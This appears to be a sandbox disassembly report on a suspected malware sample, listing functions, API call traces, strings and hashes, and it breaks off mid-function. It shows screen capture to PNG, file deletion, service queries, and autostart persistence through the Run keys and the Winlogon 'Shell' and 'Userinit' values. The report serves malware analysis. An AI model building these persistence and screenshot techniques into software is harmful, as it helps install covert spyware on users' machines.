                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$?c_str@?$basic_string@$V01@@$D@1@@Filewcscpy$?length@?$basic_string@FindG@1@@V10@V10@0@V10@@wcscat$?begin@?$basic_string@DirectoryRemove$??2@??4?$basic_string@??8std@@?end@?$basic_string@?resize@?$basic_string@?rfind@?$basic_string@AttributesCloseDeleteFirstG@2@@0@LocalNextTimeV01@printf
                                                • String ID: Deleted file: $Unable to delete: $[ERROR]$[INFO]
                                                • API String ID: 1518591422-1234827951
                                                • Opcode ID: 6830387a61e3ed70f70d5bd436e76ef107abfe9006262fa58bdd639802cc9299
                                                • Instruction ID: 8eecb533a296c3ad615e214839620b8ad24914488308803643118c7b387faa75
                                                • Opcode Fuzzy Hash: 6830387a61e3ed70f70d5bd436e76ef107abfe9006262fa58bdd639802cc9299
                                                • Instruction Fuzzy Hash: F65121B1910119AFDF04BFA1DC5ADEE773CFB14306F0045AAF506E20A1EB389A45CB69
                                                Function 0040FA6E Relevance: 56.1, APIs: 27, Strings: 5, Instructions: 139libraryfileloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0040FEAA,?,png,00419BC8), ref: 0040FA87
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040FA92
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040FA9D
                                                  • Part of subcall function 0040F0DF: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040F0F5
                                                  • Part of subcall function 0040F0DF: CreateCompatibleDC.GDI32(00000000), ref: 0040F101
                                                  • Part of subcall function 0040F0DF: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040F113
                                                  • Part of subcall function 0040F0DF: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040F11B
                                                  • Part of subcall function 0040F0DF: CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040F124
                                                  • Part of subcall function 0040F0DF: DeleteDC.GDI32(00000000), ref: 0040F138
                                                  • Part of subcall function 0040F0DF: DeleteDC.GDI32(?), ref: 0040F13D
                                                  • Part of subcall function 0040F0DF: DeleteObject.GDI32(00000000), ref: 0040F140
                                                  • Part of subcall function 0040F0DF: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 0040F367
                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040FAC2
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040FAC9
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040FAD7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040FAE1
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 0040FB10
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 0040FB2D
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FB43
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040FB50
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040FB69
                                                • DeleteFileW.KERNEL32(00000000), ref: 0040FB70
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040FB7D
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040FB86
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040FB9B
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040FBA5
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0040FEAA,?,dat,?,00000000), ref: 0040FBCD
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040FBD8
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040FBE6
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040FBEF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FBFF
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040FC10
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FC19
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FC22
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FC33
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040FC3C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@$Delete$Create$?data@?$basic_string@?size@?$basic_string@CapsCompatibleD@1@@DeviceG@1@@G@2@@0@Hstd@@V10@V?$basic_string@$?length@?$basic_string@AddressBitmapFileLibraryLoadObjectProcV01@@
                                                • String ID: Shlwapi.dll$XKA$dat$image/png$png
                                                • API String ID: 2652402062-4197093803
                                                • Opcode ID: 49a7f85e606ec972f7c93bd4b775efb34281e01f7ecb548ca196269d5eedbdd6
                                                • Instruction ID: 6a4b97af18714654c4f00727cde383db7164cf81f51f446ce14a96cfb34c37c3
                                                • Opcode Fuzzy Hash: 49a7f85e606ec972f7c93bd4b775efb34281e01f7ecb548ca196269d5eedbdd6
                                                • Instruction Fuzzy Hash: 2251CE72900119ABCB05FFE0ED5A9EE7B78FF14306B10817AF506A20A1EF745B49CB58
                                                Function 004101F3 Relevance: 54.4, APIs: 36, Instructions: 407COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410205
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6C995E04), ref: 0041021D
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410227
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410230
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 00410241
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410250
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000,00000001,00419288,00000000), ref: 00410301
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,00419288,00000000), ref: 00410311
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00419288,00000000), ref: 0041031E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007E,?,?,?,?,?,?,?,?,?,?,00419288,00000000), ref: 0041033F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00419288,00000000), ref: 0041034B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00419288,00000000), ref: 00410328
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000), ref: 0041037B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,00000000), ref: 00410385
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002,00000000), ref: 004102A3
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                  • Part of subcall function 00410C16: OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00419288,?,?,004102C8), ref: 00410C22
                                                  • Part of subcall function 00410C16: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,004102C8), ref: 00410C2F
                                                  • Part of subcall function 00410C16: OpenServiceW.ADVAPI32(00000000,00000000,?,?,004102C8), ref: 00410C37
                                                  • Part of subcall function 00410C16: CloseServiceHandle.ADVAPI32(00000000,?,?,004102C8), ref: 00410C44
                                                  • Part of subcall function 00410C16: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,004102C8), ref: 00410C8F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000,00000001,00419288,?), ref: 004103E3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,00419288,?), ref: 004103F3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00419288,?), ref: 00410400
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00419288,?), ref: 0041040A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007F,?,?,?,?,?,?,?,?,?,?,00419288,?), ref: 00410421
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00419288,?), ref: 0041042D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000), ref: 0041047D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,00000000), ref: 00410487
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000), ref: 0041050E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,00000000), ref: 00410518
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000), ref: 00410598
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,00000000), ref: 004105A2
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000), ref: 00410625
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,00000000), ref: 0041062F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007A,?,?,?,?,00419288,00000000), ref: 00410649
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00410660
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000079), ref: 0041069C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00419288,00000000), ref: 004106AD
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??1?$basic_string@$??0?$basic_string@V01@@$G@2@@std@@G@std@@$?length@?$basic_string@$V12@$??4?$basic_string@?c_str@?$basic_string@?substr@?$basic_string@A?$basic_string@OpenServiceV01@$??2@?find@?$basic_string@CloseD@1@@G@1@@HandleManagerV10@
                                                • String ID:
                                                • API String ID: 4151260400-0
                                                • Opcode ID: 602003751ec81ed49b7e1cf6e4bbbb23f45e95e987e04ed0a8341c2b619dc451
                                                • Instruction ID: 66e90415a7dacb65959ad14462164d715d6e760cef8c680516ce79003ec3c066
                                                • Opcode Fuzzy Hash: 602003751ec81ed49b7e1cf6e4bbbb23f45e95e987e04ed0a8341c2b619dc451
                                                • Instruction Fuzzy Hash: 2CC1A6B19002096BDB08FB61DD96DFF373CEB10304F00455EF516A61D2EEB95A98C7AA
                                                Function 00407112 Relevance: 52.7, APIs: 23, Strings: 7, Instructions: 158COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000000,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888,?,?,?,?,?,?,?,004074CA), ref: 00407139
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0041409C,00000001,00419994), ref: 00407163
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888), ref: 004072B1
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 004072BB
                                                  • Part of subcall function 0040AB16: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 0040AB7C
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 00407143
                                                  • Part of subcall function 0040AB16: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040AB23
                                                  • Part of subcall function 0040AB16: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(0041409C,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958), ref: 0040AB32
                                                  • Part of subcall function 0040AB16: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958), ref: 0040AB40
                                                  • Part of subcall function 0040AB16: RegSetValueExW.ADVAPI32(80000002,004072D5,00000000,?,00000000,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0040AB53
                                                  • Part of subcall function 0040AB16: RegCloseKey.ADVAPI32(80000002,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958), ref: 0040AB5E
                                                  • Part of subcall function 0040AB16: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 0040AB6D
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000000,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888,?,?,?,?,?,?,?,004074CA), ref: 0040717D
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 00407187
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0041409C,00000001,00419994), ref: 004071A7
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(explorer.exe, ,?,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888), ref: 004071C9
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,004074CA), ref: 004071D4
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(00000001,00000000), ref: 004071E1
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004071EB
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040720D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407216
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040721F
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe, ,?,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888), ref: 00407241
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040724C
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00407259
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407263
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407285
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040728E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407297
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0041409C,00000001,00419994), ref: 004072DB
                                                Strings
                                                • Software\Microsoft\Windows NT\CurrentVersion\Winlogon\, xrefs: 004071F8, 00407270
                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 004072C6
                                                • C:\WINDOWS\system32\userinit.exe, , xrefs: 0040723C
                                                • Userinit, xrefs: 0040726B
                                                • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040714E, 00407192
                                                • explorer.exe, , xrefs: 004071C4
                                                • Shell, xrefs: 004071F3
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$G@2@@0@Hstd@@V?$basic_string@$??1?$basic_string@$V10@$V10@@$??0?$basic_string@G@1@@V10@0@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                                • String ID: C:\WINDOWS\system32\userinit.exe, $Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Userinit$explorer.exe,
                                                • API String ID: 3489422410-3841441107
                                                • Opcode ID: 8217f85f80baf3a493a0c19dce6838968a804ba217b3b14124a8fd15949ae73a
                                                • Instruction ID: f779ddf5d10224dd3a0bdae119fd7e47ebf2fabcfa4eac336a0a7ef85d89992a
                                                • Opcode Fuzzy Hash: 8217f85f80baf3a493a0c19dce6838968a804ba217b3b14124a8fd15949ae73a
                                                • Instruction Fuzzy Hash: A841BC71D002147BDB00BFA2DC4AEEF7F3CDB24311F004469F519A1192E6B996A8C7AA
                                                Function 0040219E Relevance: 52.7, APIs: 29, Strings: 1, Instructions: 151synchronizationthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,00419D80,00000000), ref: 004021B0
